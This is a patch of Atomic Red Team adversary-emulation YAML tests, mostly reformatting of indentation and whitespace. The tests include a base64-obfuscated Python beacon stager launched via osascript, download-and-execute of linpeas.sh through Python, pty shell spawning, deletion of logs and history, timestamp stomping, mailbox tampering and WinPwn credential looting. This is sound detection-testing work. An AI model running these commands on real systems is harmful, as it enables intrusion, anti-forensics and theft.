      osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg=='));\\\" | python &\""
    name: sh
-
@@ -178,13 +178,13 @@ atomic_tests:
      echo "Automated installer not implemented yet, please install chsh manually"
  executor:
    name: bash
-    elevation_required: true 
+    elevation_required: true
    command: |
      [ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
      cat /etc/passwd |grep ^art
      chsh -s /bin/sh art
      cat /etc/passwd |grep ^art
-    cleanup_command: | 
+    cleanup_command: |
      [ "$(uname)" = 'FreeBSD' ] && rmuser -y art || userdel art
 - name: Environment variable scripts
  auto_generated_guid: bdaebd56-368b-4970-a523-f905ff4a8a51
@@ -194,11 +194,11 @@ atomic_tests:
  - linux
  executor:
    name: sh
-    elevation_required: false 
+    elevation_required: false
    command: |
      export ART='echo "Atomic Red Team was here... T1059.004"'
      echo $ART |/bin/sh
-    cleanup_command: | 
+    cleanup_command: |
      unset ART
 - name: Detecting pipe-to-shell
  auto_generated_guid: fca246a8-a585-4f28-a2df-6495973976a1
@@ -237,5 +237,5 @@ atomic_tests:
  executor:
    name: sh
    elevation_required: false
-    command: |
+    command: |-
      uname -srm
@@ -1,172 +1,172 @@
 attack_technique: T1059.006
 display_name: 'Command and Scripting Interpreter: Python'
-atomic_tests: 
-  - name: Execute shell script via python's command mode arguement
-    auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
-    description: Download and execute shell script and write to file then execute locally using Python -c (command mode)
-    supported_platforms: 
-      - linux
-    input_arguments: 
-      script_url: 
-        description: Shell script public URL
-        type: string
-        default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
-      payload_file_name: 
-        description: Name of shell script downloaded from the script_url
-        type: string
-        default: T1059.006-payload
-      executor: 
-        description: FreeBSD or Linux shell
-        type: string
-        default: sh
-      script_args: 
-        description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files.  
-        type: string
-        default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
-    dependency_executor_name: sh
-    dependencies: 
-      - description: Verify if python is in the environment variable path and attempt to import requests library.
-        prereq_command: |
-          which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
-          $which_python -c 'import requests' 2>/dev/null; echo $?
-        get_prereq_command: |
-          pip install requests
-    executor: 
-      command: |
-        which_python=$(which python || which python3 || which python3.9 || which python2)
-        $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
-      name: sh
-      cleanup_command: |
-        rm #{payload_file_name} 
-  - name: 'Execute Python via scripts'
-    auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
-    description: Create Python file (.py) that downloads and executes shell script via executor arguments
-    supported_platforms:
-      - linux
-    input_arguments: 
-      python_script_name: 
-        description: Python script name
-        type: path
-        default: T1059.006.py
-      script_url: 
-        description: Shell script public URL
-        type: string
-        default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
-      payload_file_name: 
-        description: Shell script file name downloaded from the script_url
-        type: string
-        default: T1059.006-payload
-      executor: 
-        description: Payload or script interpreter / executor
-        type: string
-        default: sh
-      script_args: 
-        description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files
-        type: string
-        default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
-    dependency_executor_name: sh
-    dependencies: 
-      - description: |
-          Requires Python
-        prereq_command: |
-          which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
-          $which_python -c 'import requests' 2>/dev/null; echo $?
-        get_prereq_command: |
-          pip install requests    
-    executor: 
-      command: |
-        which_python=$(which python || which python3 || which python3.9 || which python2)
-        echo 'import requests' > #{python_script_name}
-        echo 'import os' >> #{python_script_name}
-        echo 'url = "#{script_url}"' >> #{python_script_name}
-        echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
-        echo 'session = requests.session()' >> #{python_script_name}
-        echo 'source = session.get(url).content' >> #{python_script_name}
-        echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
-        echo 'fd.write(source)' >> #{python_script_name}
-        echo 'fd.close()' >> #{python_script_name}
-        echo 'os.system(malicious_command)' >> #{python_script_name}
-        $which_python #{python_script_name}
-      name: sh
-      cleanup_command: |
-        rm #{python_script_name} #{payload_file_name}  
-  - name: 'Execute Python via Python executables'
-    auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
-    description: |
-      Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
-    supported_platforms: 
-      - linux
-    input_arguments: 
-      python_script_name: 
-        description: Name of Python script name
-        type: path
-        default: T1059.006.py
-      script_url: 
-        description: URL hosting external malicious payload
-        type: string
-        default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
-      payload_file_name: 
-        description: Shell script file name downloaded from the script_url
-        type: string
-        default: T1059.006-payload
-      executor: 
-        description: Payload or script interpreter / executor
-        type: string
-        default: sh
-      script_args: 
-        description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files
-        type: string
-        default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
-      python_binary_name: 
-        description: Name of Python file to be compiled
-        type: path
-        default: T1059.006.pyc
-    dependency_executor_name: sh
-    dependencies: 
-      - description: |
-          Requires Python
-        prereq_command: |
-          which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
-          $which_python -c 'import requests' 2>/dev/null; echo $?
-        get_prereq_command: |
-          pip install requests    
-    executor: 
-      command: |
-        which_python=$(which python || which python3 || which python3.9 || which python2)
-        echo 'import requests' > #{python_script_name}
-        echo 'import os' >> #{python_script_name}
-        echo 'url = "#{script_url}"' >> #{python_script_name}
-        echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
-        echo 'session = requests.session()' >> #{python_script_name}
-        echo 'source = session.get(url).content' >> #{python_script_name}
-        echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
-        echo 'fd.write(source)' >> #{python_script_name}
-        echo 'fd.close()' >> #{python_script_name}
-        echo 'os.system(malicious_command)' >> #{python_script_name}
-        $which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")'
-        $which_python #{python_binary_name}
-      name: sh
-      cleanup_command: |
-        rm #{python_binary_name} #{python_script_name} #{payload_file_name}
-  - name: 'Python pty module and spawn function used to spawn sh or bash'
-    auto_generated_guid: 161d694c-b543-4434-85c3-c3a433e33792
-    description: |
-      Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
-    supported_platforms:
-    - linux
-    dependencies:
-      - description: |
-          Verify if python is in the environment variable path and attempt to import requests library.
-        prereq_command: |
-          which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
-          $which_python -c 'import requests' 2>/dev/null; echo $?          
-        get_prereq_command: |
-          pip install requests
+atomic_tests:
+- name: Execute shell script via python's command mode arguement
+  auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
+  description: Download and execute shell script and write to file then execute locally using Python -c (command mode)
+  supported_platforms:
+  - linux
+  input_arguments:
+    script_url:
+      description: Shell script public URL
+      type: string
+      default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
+    payload_file_name:
+      description: Name of shell script downloaded from the script_url
+      type: string
+      default: T1059.006-payload
    executor:
-      command: |-
-        which_python=$(which python || which python3 || which python3.9 || which python2)
-        $which_python -c "import pty;pty.spawn('/bin/sh')"
-        exit
-        $which_python -c "import pty;pty.spawn('/bin/bash')"
-        exit
-      name: sh
+      description: FreeBSD or Linux shell
+      type: string
+      default: sh
+    script_args:
+      description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files.
+      type: string
+      default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
+  dependency_executor_name: sh
+  dependencies:
+  - description: Verify if python is in the environment variable path and attempt to import requests library.
+    prereq_command: |
+      which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
+      $which_python -c 'import requests' 2>/dev/null; echo $?
+    get_prereq_command: |
+      pip install requests
+  executor:
+    command: |
+      which_python=$(which python || which python3 || which python3.9 || which python2)
+      $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
+    name: sh
+    cleanup_command: |
+      rm #{payload_file_name} 
+- name: 'Execute Python via scripts'
+  auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
+  description: Create Python file (.py) that downloads and executes shell script via executor arguments
+  supported_platforms:
+  - linux
+  input_arguments:
+    python_script_name:
+      description: Python script name
+      type: path
+      default: T1059.006.py
+    script_url:
+      description: Shell script public URL
+      type: string
+      default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
+    payload_file_name:
+      description: Shell script file name downloaded from the script_url
+      type: string
+      default: T1059.006-payload
+    executor:
+      description: Payload or script interpreter / executor
+      type: string
+      default: sh
+    script_args:
+      description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files
+      type: string
+      default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      Requires Python
+    prereq_command: |
+      which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
+      $which_python -c 'import requests' 2>/dev/null; echo $?
+    get_prereq_command: |
+      pip install requests    
+  executor:
+    command: |
+      which_python=$(which python || which python3 || which python3.9 || which python2)
+      echo 'import requests' > #{python_script_name}
+      echo 'import os' >> #{python_script_name}
+      echo 'url = "#{script_url}"' >> #{python_script_name}
+      echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
+      echo 'session = requests.session()' >> #{python_script_name}
+      echo 'source = session.get(url).content' >> #{python_script_name}
+      echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
+      echo 'fd.write(source)' >> #{python_script_name}
+      echo 'fd.close()' >> #{python_script_name}
+      echo 'os.system(malicious_command)' >> #{python_script_name}
+      $which_python #{python_script_name}
+    name: sh
+    cleanup_command: |
+      rm #{python_script_name} #{payload_file_name}  
+- name: 'Execute Python via Python executables'
+  auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
+  description: |
+    Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
+  supported_platforms:
+  - linux
+  input_arguments:
+    python_script_name:
+      description: Name of Python script name
+      type: path
+      default: T1059.006.py
+    script_url:
+      description: URL hosting external malicious payload
+      type: string
+      default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
+    payload_file_name:
+      description: Shell script file name downloaded from the script_url
+      type: string
+      default: T1059.006-payload
+    executor:
+      description: Payload or script interpreter / executor
+      type: string
+      default: sh
+    script_args:
+      description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files
+      type: string
+      default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
+    python_binary_name:
+      description: Name of Python file to be compiled
+      type: path
+      default: T1059.006.pyc
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      Requires Python
+    prereq_command: |
+      which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
+      $which_python -c 'import requests' 2>/dev/null; echo $?
+    get_prereq_command: |
+      pip install requests    
+  executor:
+    command: |
+      which_python=$(which python || which python3 || which python3.9 || which python2)
+      echo 'import requests' > #{python_script_name}
+      echo 'import os' >> #{python_script_name}
+      echo 'url = "#{script_url}"' >> #{python_script_name}
+      echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
+      echo 'session = requests.session()' >> #{python_script_name}
+      echo 'source = session.get(url).content' >> #{python_script_name}
+      echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
+      echo 'fd.write(source)' >> #{python_script_name}
+      echo 'fd.close()' >> #{python_script_name}
+      echo 'os.system(malicious_command)' >> #{python_script_name}
+      $which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")'
+      $which_python #{python_binary_name}
+    name: sh
+    cleanup_command: |
+      rm #{python_binary_name} #{python_script_name} #{payload_file_name}
+- name: 'Python pty module and spawn function used to spawn sh or bash'
+  auto_generated_guid: 161d694c-b543-4434-85c3-c3a433e33792
+  description: |
+    Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
+  supported_platforms:
+  - linux
+  dependencies:
+  - description: |
+      Verify if python is in the environment variable path and attempt to import requests library.
+    prereq_command: |
+      which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
+      $which_python -c 'import requests' 2>/dev/null; echo $?          
+    get_prereq_command: |
+      pip install requests
+  executor:
+    command: |-
+      which_python=$(which python || which python3 || which python3.9 || which python2)
+      $which_python -c "import pty;pty.spawn('/bin/sh')"
+      exit
+      $which_python -c "import pty;pty.spawn('/bin/bash')"
+      exit
+    name: sh
@@ -44,7 +44,7 @@ atomic_tests:
      rm -rf /var/log/security
    name: sh
    elevation_required: true
- name: Delete log files using built-in log utility 
+- name: Delete log files using built-in log utility
  auto_generated_guid: 653d39cd-bae7-499a-898c-9fb96b8b5cd1
  description: |
    This test deletes main log datastore, inflight log data, time-to-live data(TTL), fault and error content
@@ -369,7 +369,7 @@ atomic_tests:
      sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
      sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
    name: sh
-    elevation_required: true 
+    elevation_required: true
 - name: Overwrite Linux Mail Spool
  auto_generated_guid: 1602ff76-ed7f-4c94-b550-2f727b4782d4
  description: |
@@ -410,5 +410,5 @@ atomic_tests:
      echo 0> #{log_path}
    name: bash
    elevation_required: true
-    cleanup_command: |
+    cleanup_command: |-
      if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path} ; fi
@@ -92,7 +92,7 @@ atomic_tests:
      export HISTFILESIZE=0
      history -c
    name: sh
- name:  Clear and Disable Bash History Logging
+- name: Clear and Disable Bash History Logging
  auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6
  description: |
    Clears the history and disable bash history logging of the current shell and future shell sessions
@@ -110,7 +110,7 @@ atomic_tests:
      . ~/.bashrc
      set -o history
    name: sh
- name:  Use Space Before Command to Avoid Logging to History
+- name: Use Space Before Command to Avoid Logging to History
  auto_generated_guid: 53b03a54-4529-4992-852d-a00b4b7215a6
  description: |
    Using a space before a command causes the command to not be logged in the Bash History file
@@ -119,11 +119,11 @@ atomic_tests:
  - macos
  executor:
    command: |
-       hostname
-       whoami
+      hostname
+      whoami
    name: sh

- name:  Disable Bash History Logging with SSH -T
+- name: Disable Bash History Logging with SSH -T
  auto_generated_guid: 5f8abd62-f615-43c5-b6be-f780f25790a1
  description: |
    Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog
@@ -144,7 +144,7 @@ atomic_tests:
    cleanup_command: |
      [ "$(uname)" = 'FreeBSD' ] && rmuser -y testuser1 || userdel -f testuser1
    name: sh
- name:  Prevent Powershell History Logging
+- name: Prevent Powershell History Logging
  auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370
  description: |
    Prevents Powershell history
@@ -152,11 +152,10 @@ atomic_tests:
  - windows
  executor:
    command: |
-       Set-PSReadlineOption -HistorySaveStyle SaveNothing
+      Set-PSReadlineOption -HistorySaveStyle SaveNothing
    name: powershell
    cleanup_command: 'Set-PSReadLineOption -HistorySaveStyle SaveIncrementally'
-    
- name:  Clear Powershell History by Deleting History File
+- name: Clear Powershell History by Deleting History File
  auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037
  description: |
    Clears Powershell history
@@ -164,10 +163,10 @@ atomic_tests:
  - windows
  executor:
    command: |
-       Remove-Item (Get-PSReadlineOption).HistorySavePath
+      Remove-Item (Get-PSReadlineOption).HistorySavePath
    name: powershell

- name:  Set Custom AddToHistoryHandler to Avoid History File Logging
+- name: Set Custom AddToHistoryHandler to Avoid History File Logging
  auto_generated_guid: 1d0d9aa6-6111-4f89-927b-53e8afae7f94
  description: |
    The "AddToHistoryHandler" receives the current command as the $line variable and then returns $true if 
@@ -16,7 +16,7 @@ atomic_tests:
    file_to_delete:
      description: Path of file to delete
      type: path
-      default: /tmp/victim-files/T1070.004-test.txt  
+      default: /tmp/victim-files/T1070.004-test.txt
  dependency_executor_name: sh
  dependencies:
  - description: |
@@ -79,8 +79,7 @@ atomic_tests:
  - windows
  input_arguments:
    file_to_delete:
-      description: File to delete. Run the prereq command to create it if it does
-        not exist.
+      description: File to delete. Run the prereq command to create it if it does not exist.
      type: string
      default: '%temp%\deleteme_T1551.004'
  dependency_executor_name: command_prompt
@@ -234,9 +234,9 @@ atomic_tests:
  auto_generated_guid: 87fffff4-d371-4057-a539-e3b24c37e564
  description: |
    Stomps on the modification timestamp of a file using MacOS's SetFile utility
-  supported_platforms: 
-    - macos
-  input_arguments: 
+  supported_platforms:
+  - macos
+  input_arguments:
    target_filename:
      description: |
        Path of file that we are going to stomp on last modified time
@@ -257,5 +257,5 @@ atomic_tests:
    name: sh
    command: |
      SetFile -m #{target_date} #{target_filename}
-    cleanup_command: |
+    cleanup_command: |-
      rm -f #{target_filename}
@@ -1,111 +1,110 @@
-attack_technique: T1070.008
-display_name: 'Email Collection: Mailbox Manipulation'
-atomic_tests:
- name: Copy and Delete Mailbox Data on Windows
+attack_technique: T1070.008
+display_name: 'Email Collection: Mailbox Manipulation'
+atomic_tests:
+- name: Copy and Delete Mailbox Data on Windows
  auto_generated_guid: d29f01ea-ac72-4efc-8a15-bea64b77fabf
-  description: |
-    Copies and deletes mail data on Windows
-  supported_platforms:
-  - windows
-  executor:
-    command: |
-      New-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -ItemType Directory -ErrorAction Ignore
-      Get-ChildItem -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data" -Exclude copy | ForEach-Object { Copy-Item -Path $_.FullName -Destination "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -Recurse -Force -ErrorAction Ignore }
-      Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -Recurse -Force -ErrorAction Ignore
-    cleanup_command: |
-      Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -Recurse -Force -ErrorAction Ignore
-    name: powershell
-    elevation_required: true
-
- name: Copy and Delete Mailbox Data on Linux
+  description: |
+    Copies and deletes mail data on Windows
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      New-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -ItemType Directory -ErrorAction Ignore
+      Get-ChildItem -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data" -Exclude copy | ForEach-Object { Copy-Item -Path $_.FullName -Destination "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -Recurse -Force -ErrorAction Ignore }
+      Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -Recurse -Force -ErrorAction Ignore
+    cleanup_command: |
+      Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -Recurse -Force -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
+
+- name: Copy and Delete Mailbox Data on Linux
  auto_generated_guid: 25e2be0e-96f7-4417-bd16-a4a2500e3802
-  description: |
-    Copies and deletes mail data on Linux
-  supported_platforms:
-  - linux
-  executor:
-    command: |
-      mkdir -p /var/spool/mail/copy
-      for file in /var/spool/mail/*; do
-        if [ "$(basename "$file")" != "copy" ]
-        then
-          cp -R "$file" /var/spool/mail/copy/
-        fi
-      done
-      rm -rf /var/spool/mail/copy/*
-    cleanup_command: |
-      rm -rf /var/spool/mail/copy
-    name: bash
-    elevation_required: true
-
- name: Copy and Delete Mailbox Data on macOS
+  description: |
+    Copies and deletes mail data on Linux
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      mkdir -p /var/spool/mail/copy
+      for file in /var/spool/mail/*; do
+        if [ "$(basename "$file")" != "copy" ]
+        then
+          cp -R "$file" /var/spool/mail/copy/
+        fi
+      done
+      rm -rf /var/spool/mail/copy/*
+    cleanup_command: |
+      rm -rf /var/spool/mail/copy
+    name: bash
+    elevation_required: true
+
+- name: Copy and Delete Mailbox Data on macOS
  auto_generated_guid: 3824130e-a6e4-4528-8091-3a52eeb540f6
-  description: |
-    Copies and deletes mail data on macOS
-  supported_platforms:
-  - macos
-  executor:
-    command: |
-      mkdir ~/Library/Mail/copy
-      cp -R ~/Library/Mail/* ~/Library/Mail/copy
-      rm -rf ~/Library/Mail/copy/*
-    cleanup_command: |
-      rm -rf ~/Library/Mail/copy
-    name: bash
-    elevation_required: true
-
- name: Copy and Modify Mailbox Data on Windows
+  description: |
+    Copies and deletes mail data on macOS
+  supported_platforms:
+  - macos
+  executor:
+    command: |
+      mkdir ~/Library/Mail/copy
+      cp -R ~/Library/Mail/* ~/Library/Mail/copy
+      rm -rf ~/Library/Mail/copy/*
+    cleanup_command: |
+      rm -rf ~/Library/Mail/copy
+    name: bash
+    elevation_required: true
+
+- name: Copy and Modify Mailbox Data on Windows
  auto_generated_guid: edddff85-fee0-499d-9501-7d4d2892e79b
-  description: |
-    Copies and modifies mail data on Windows
-  supported_platforms:
-  - windows
-  executor:
-    command: |
-      New-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -ItemType Directory -ErrorAction Ignore
-      Get-ChildItem -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data" -Exclude copy | ForEach-Object { Copy-Item -Path $_.FullName -Destination "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -Recurse -Force -ErrorAction Ignore }
-      Get-ChildItem -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -File | ForEach-Object { Add-Content -Path $_.FullName -Value "Modification for Atomic Red Test" -ErrorAction Ignore }
-    cleanup_command: |
-      Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -Recurse -Force -ErrorAction Ignore
-    name: powershell
-    elevation_required: true
-
- name: Copy and Modify Mailbox Data on Linux
+  description: |
+    Copies and modifies mail data on Windows
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      New-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -ItemType Directory -ErrorAction Ignore
+      Get-ChildItem -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data" -Exclude copy | ForEach-Object { Copy-Item -Path $_.FullName -Destination "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -Recurse -Force -ErrorAction Ignore }
+      Get-ChildItem -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -File | ForEach-Object { Add-Content -Path $_.FullName -Value "Modification for Atomic Red Test" -ErrorAction Ignore }
+    cleanup_command: |
+      Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -Recurse -Force -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
+
+- name: Copy and Modify Mailbox Data on Linux
  auto_generated_guid: 6d99f93c-da56-49e3-b195-163090ace4f6
-  description: |
-    Copies and modifies mail data on Linux
-  supported_platforms:
-  - linux
-  executor:
-    command: |
-      mkdir -p /var/spool/mail/copy
-      for file in /var/spool/mail/*; do
-        if [ "$(basename "$file")" != "copy" ]
-        then
-          cp -R "$file" /var/spool/mail/copy/
-          if [ -f "/var/spool/mail/copy/$(basename "$file")" ]; then
-            echo "Modification for Atomic Red Test" >> "/var/spool/mail/copy/$(basename "$file")"
-          fi
-        fi
-      done
-    cleanup_command: |
-      rm -rf /var/spool/mail/copy
-    name: bash
-    elevation_required: true
-
- name: Copy and Modify Mailbox Data on macOS
+  description: |
+    Copies and modifies mail data on Linux
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      mkdir -p /var/spool/mail/copy
+      for file in /var/spool/mail/*; do
+        if [ "$(basename "$file")" != "copy" ]
+        then
+          cp -R "$file" /var/spool/mail/copy/
+          if [ -f "/var/spool/mail/copy/$(basename "$file")" ]; then
+            echo "Modification for Atomic Red Test" >> "/var/spool/mail/copy/$(basename "$file")"
+          fi
+        fi
+      done
+    cleanup_command: |
+      rm -rf /var/spool/mail/copy
+    name: bash
+    elevation_required: true
+
+- name: Copy and Modify Mailbox Data on macOS
  auto_generated_guid: 8a0b1579-5a36-483a-9cde-0236983e1665
-  description: |
-    Copies and modifies mail data on macOS
-  supported_platforms:
-  - macos
-  executor:
-    command: |
-      mkdir ~/Library/Mail/copy
-      cp -R ~/Library/Mail/* ~/Library/Mail/copy
-      echo "Manipulated data" > ~/Library/Mail/copy/manipulated.txt
-    cleanup_command: |
-      rm -rf ~/Library/Mail/copy
-    name: bash
-    elevation_required: true
-
+  description: |
+    Copies and modifies mail data on macOS
+  supported_platforms:
+  - macos
+  executor:
+    command: |
+      mkdir ~/Library/Mail/copy
+      cp -R ~/Library/Mail/* ~/Library/Mail/copy
+      echo "Manipulated data" > ~/Library/Mail/copy/manipulated.txt
+    cleanup_command: |
+      rm -rf ~/Library/Mail/copy
+    name: bash
+    elevation_required: true
@@ -64,5 +64,5 @@ atomic_tests:
  executor:
    name: command_prompt
    elevation_required: true
-    command: |
+    command: |-
      "%PROGRAMFILES(x86)%/#{PDQ_Deploy_exe}"
@@ -12,7 +12,7 @@ atomic_tests:
    output_file:
      description: Location to save downloaded discovery.bat file
      type: path
-      default: $env:TEMP\discovery.bat        
+      default: $env:TEMP\discovery.bat
  executor:
    command: |
      Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file}
@@ -65,7 +65,7 @@ atomic_tests:
      net user #{guest_user} /active:no
    name: command_prompt
    elevation_required: true
-    
+
 - name: Enable Guest Account on macOS
  auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
  description: This test enables the guest account on macOS using sysadminctl utility.
@@ -78,7 +78,7 @@ atomic_tests:
      dseditgroup -o edit -d art-user -t user admin
    name: bash
    elevation_required: true
- name: WinPwn - Loot local Credentials - powerhell kittie 
+- name: WinPwn - Loot local Credentials - powerhell kittie
  auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
  description: Loot local Credentials - powerhell kittie technique via function of WinPwn
  supported_platforms:
@@ -200,8 +200,7 @@ atomic_tests:
      su nobody
      whoami
      exit
-    cleanup_command: |
+    cleanup_command: |-
      pw usermod nobody -s /usr/sbin/nologin
      cat /etc/passwd |grep nobody
      # -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
-
@@ -48,7 +48,7 @@ atomic_tests:
      if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
    get_prereq_command: |
      echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
-  - description: | 
+  - description: |
      Check if user is logged in 
    prereq_command: |
      gcloud config get-value account
@@ -65,23 +65,23 @@ atomic_tests:
